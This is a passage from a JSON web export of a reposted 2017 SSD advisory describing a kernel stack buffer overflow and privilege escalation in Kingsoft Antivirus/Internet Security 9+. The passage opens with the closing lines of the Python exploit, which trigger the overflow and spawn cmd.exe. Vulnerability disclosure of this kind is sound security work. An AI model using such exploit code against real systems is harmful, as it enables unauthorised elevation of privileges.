id=\"crayon-5a42caec3600a215264132-180\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) found nt base at 0x%08x&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">nt<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-181\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">we_can_trigger_overflow<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-182\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;cmd.exe&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-183\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-184\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(-) it appears that kingsoft Internet Security is not installed!&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a42caec3600a215264132-185\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;__main__&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a42caec3600a215264132-186\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0161 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3597\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Tue, 26 Dec 2017 10:03:53 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a kernel stack buffer overflow that leads to privilege escalation found in Kingsoft Antivirus\/Internet Security 9+. Kingsoft Antivirus &#8220;provides effective and efficient protection solution at no cost to users. It applies cloud security technology to monitor, scan and protect your systems without any worrying. The comprehensive defender and anti-virus &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3597\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Kingsoft Antivirus\/Internet Security 9+ Privilege Escalation<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12033,11946,10757],"class_list":["post-10951","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-buffer-overflow","tag-privilege-escalation","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10951","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10951"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10951\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10951"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10951"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10951"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}